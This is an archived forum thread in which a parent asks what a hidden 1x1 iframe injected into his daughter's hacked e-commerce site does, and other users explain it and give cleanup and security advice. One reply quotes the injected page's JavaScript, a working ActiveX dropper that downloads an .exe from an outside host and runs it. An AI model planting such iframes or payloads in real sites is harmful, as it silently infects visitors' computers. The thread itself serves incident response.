Jump to content

Archived

This topic is now archived and is closed to further replies.

malcsenior

Hacked Site : What does this code do ?

Recommended Posts

My daughters website, eCommerce based, has been hacked and the following line was inserted in her home (html) page and index (php) page:

<iframe src='http://ns192168-ip255.net/traffic/index.php' width=1
height=1></iframe>

What does it do and who did it ?

Pages are now read only any other security advice would be appreciated.

Share this post


Link to post
Share on other sites
its an inline frame very common among people who want to insert another web page into your page.

you can just delete what you have posted

as far as security goes and assuming that your site is written in php you can use strip_tags() which will remove all the html from a string that was submitted.

but if it was not submitted through a post action and the site was actually hacked into, then you just may want to change your password to get access to the site

Share this post


Link to post
Share on other sites
An Iframe is like inserting a page into another one. It basicly adds a a scrollable page inside another page.
In this case, from what I can see, it has a 1 by 1 pixel size so it should display something small, but I can also see that from my understanding is safe to remove the line.
Hope this help, and wait for advise from the experts :)

Share this post


Link to post
Share on other sites
Thanks so far, I understand the iframe tag, but what does the links to [color=red]ns192168-ip255.net/traffic/index.php[/color] do, is it feeding information to another server ?

Share this post


Link to post
Share on other sites
[code]var obj_RDS = document.createElement('object');
obj_RDS.setAttribute('id','obj_RDS');
obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
var obj_msxml2 = obj_RDS.CreateObject("msxml2.XMLHTTP","");
obj_msxml2.open("GET","http://ns192168-ip255.net/traffic/web.exe",false);
obj_msxml2.send();
var obj_ShellApp = obj_RDS.CreateObject("Shell.Application","");
var obj_adodb = obj_RDS.CreateObject("adodb.stream","");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\246172160121.exe";
obj_adodb.SaveToFile(fn,2);
obj_ShellApp.ShellExecute(fn);[/code]

was in the page that was inserted... So from what i gather it was downloading http://ns192168-ip255.net/traffic/web.exe to what ever computer viewed that page and saving it as to the local computer as C:\246...exe

Share this post


Link to post
Share on other sites
Whoa, I just rewent to that site intending to analyze what it does farther, and the source code of it has been changed  :'(.  Now that page just does nothing... It calls an Iframe to a non existing site... You should still remove the iframe code from your daughters page though, and check on your computer for a wierd file on the top of the C drive named <random numbers>.exe

Share this post


Link to post
Share on other sites
yea now it has this

http://aaaafffffdddd.net

which is obviously not a real site

Share this post


Link to post
Share on other sites
Its odd how the page was changed about 3 seconds after i looked at it....

Share this post


Link to post
Share on other sites
theres a .exe application running that code check the .exe name and exstention in the windows search see what you get.

Share this post


Link to post
Share on other sites
[quote=malcsenior]
Pages are now read only any other security advice would be appreciated.
[/quote]
Securing your site is something that requires more than using a few tips here and there. I'll give a few however.

I am not a security expert, but If the site's scripts are self written then you can start by read this [url=http://phpsec.org/projects/guide/]Security Guide[/url].

If this is a third party script, then you'll want to keep up on updates. You'll also want to search regularly to see if there are any known vulnerabilities for the script at a site such as http://www.securityfocus.com.

Having already been compromised, you may want to do the following things

1) Take the site down

2) Find out how the site was originally compromised. If you don't know then it's likely that it will happen again.

3) Depending on the level of access gained, you may want to change passwords for the databases,ftp,control panel etc. The associated email addresses should also possibly have their paswords changed if they are the same as any of the others.

You should be able to find sites that deal with (or have sections dealing with) overall security specifically, to get more opinions.

This doesn't have much to do with a PHP script you're writing so I've moved it to the Miscellaneous forum.

Share this post


Link to post
Share on other sites
Thanks for putting this thread in the right place.
I am in the very early stages of php, you guys are mega cool and thanks for your advice so far.
Really appreciated.

The tricky line of code was removed, immediately it was spotted, all computers have been checked. both by virus, mallware tools and searching C; root. Macs have been used to check all tricky links as they are resistant to PC hacks. Will take all your advice onboard.

Share this post


Link to post
Share on other sites
That is the craziest thing i've seen all day!

Wonder what that program ran? If you havn't already make sure you can your computer and also try running some network security programs to check your computer for any newly opened ports? Make sure you have a firewall aswell.

Another security tip is to contact the hosting company. If you don't have access to the logs they do.

See if there was an unauthorized FTP login or if it was a vunlernability in eCommerce. You should also contact eCommerce because it is their responsibility to ensure their scripts are safe, especially when dealing with funds and sales.

Share this post


Link to post
Share on other sites

×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.